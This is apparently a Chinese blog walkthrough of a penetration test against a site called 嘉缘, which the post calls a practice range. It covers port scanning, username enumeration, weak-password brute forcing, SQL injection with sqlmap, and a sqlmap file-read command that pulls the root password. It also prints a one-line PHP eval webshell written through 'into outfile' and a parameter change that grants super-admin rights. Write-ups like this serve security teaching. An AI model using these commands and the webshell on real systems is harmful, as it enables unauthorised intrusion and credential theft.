• 【渗透过程】嘉缘网站 --测试


    声明:本片文章测试网站为测试靶场

    信息收集阶段:

    首先使用了一些常见的扫描工具:nmap  御剑

    使用nmap扫描端口 发现网站开放了 135 139 445 3306 等端口

    这里可以看到网站开放了一些危害较高端口:135 225等

    使用御剑扫描到一些敏感信息:phpinfo页面  后台登录地址

    可以从info页面直接看到网站的配置信息:网站绝对路径

    当访问IP+80端口发现有探针,可从中看出网站的中间件等信息

    (这里的phpmyadmin管理无法打开)

    测试阶段:

    信息收集完成后开始进一步测试

    针对网站进行手工测试

    在用户登录处发现,该网站没有对登录进行严格限制,而且可以通过返回错误信息发现网站存在哪些用户

    根据返回信息可以发现网站有admin用户,尝试使用暴力破解

    使用工具:BurpSuite

    对用户名为admin的用户进行暴力破解 密码为弱口令 ,可以登录用户

    继续测试发现网站存在SQL注入

    尝试使用工具进行注入检测

    使用工具:sqlmap

    经过注入发现网站后台的用户名及密码 ,phpmyadmin的用户及密码

    密码为密文,尝试解密发现只有data 和kefu用户可以解开

    在注入时发现我们的权限可以进行读文件但是不可写,尝试通过读取配置文件获取root密码

    读取文件需要网站绝对路劲,这是我们可以访问之前的info页面,获取绝对路径

    尝试使用sqlmap进行读取文件 ,成功读取到root密码 (但是没有发现phpmyadmin的页面)

    sqlmap -u "注入点的URL"  --file-read =“网站绝对路径/读取的文件“

    在前端无法和会员登录后无法找到漏洞,尝试登陆后台继续测试

    在使用data用户登录后发现为普通权限

    在后台对每项功能进行测试发现有一个执行sql语句的模块

    尝试使用sql语句进行写入一句话,发现写入成功

    select "<?php eval($_POST[apple]);?>" into outfile "网站绝对路径/1.php"  //1.php 为写入一句话木马的文件名

    在发现自己权限普通权限,尝试通过抓包获取包信息,发现存在越权漏洞(垂直)

    使用工具:burp

    通过burp抓取添加管理员的包,修改fr_admin_type=manage  发现成功添加超级管理员

     

    使用菜刀(蚁剑)连接写入的一句话

    下篇

    【提权过程】嘉缘网站--代理,提权 https://www.cnblogs.com/G-Shadow/p/10965035.html

  • 相关阅读:
    Socket 通信
    一些 NuGet 程序包是使用不同于当前目标框架的目标框架安装的,可能需要重新安装
    设计模式之六大原则
    UML类图基本画法
    重写 覆盖 final override
    gaussian算子
    常量表达式: const constexpr
    const 限定符:const指针、const引用
    git命令
    vector&list 效率比较
  • 原文地址:https://www.cnblogs.com/G-Shadow/p/10964374.html
Copyright © 2020-2023  润新知